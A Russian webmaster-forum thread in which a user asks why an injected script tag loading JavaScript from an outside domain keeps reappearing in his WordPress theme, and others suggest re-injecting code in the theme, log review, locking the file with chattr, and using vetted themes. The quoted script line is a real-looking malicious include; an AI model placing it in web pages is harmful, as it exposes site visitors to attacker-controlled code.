Форум Сайтостроение Безопасность

Редирект в шаблоне wordpres

Arther
На сайте с 03.09.2009
Offline
91
Arther
928

Постоянно появляется левая ссылка в коде шаблона wordres.

<script type="text/javascript" src="http://sunrima.ru/?type=js&key=f6876cc9ba6484c"></script>

Удаляю она снова появляется, менял пароли на фтп сайт, ни могу найти дыру в Сайте. Кто сможет помощь.

vandamme
На сайте с 30.11.2008
Offline
675
vandamme
#1

видимо в теме есть второй кусочек кода, который проверяет первый и дописывает заново в случае отсутствия.

koders
На сайте с 29.04.2007
Offline
91
koders
#2

По хорошему нужно искать причину: посмотреть время изменения файла, поднять логи, глянуть, какие запросы в это время совершались.

Но есть вариант решения «в лоб» — запретить любое изменение файла.

Коннектитесь по SSH, вводите команду:

chattr +i /путь-к-файлу/файл-со-зловредом

Соответственно, когда понадобиться что-то сделать с файлом, снимаете атрибут (снова коннект по SSH и выполнение команды через консоль):

chattr -i /путь-к-файлу/файл-со-зловредом

Бесплатный PHP-скрипт массовой проверки ИКС (https://a-panov.ru/massovaya-proverka-iks-skript-na-php/)
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#3
Arther:
Кто сможет помощь.

Закреплённый топик в разделе. Если он не поможет - специалисты ищутся тут.

А в данном разделе можно только задавать вопросы. Но только на конкретные можно получить конкретный ответ.

koders:
По хорошему нужно искать причину: посмотреть время изменения файла, поднять логи, глянуть, какие запросы в это время совершались.

:) Всё намного проще - не тянуть с помоек всякую гадость. У ВП есть родной репозиторий с огромадным количеством проверенных бесплатных тем.

Да и дырку продуктивней искать не так.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий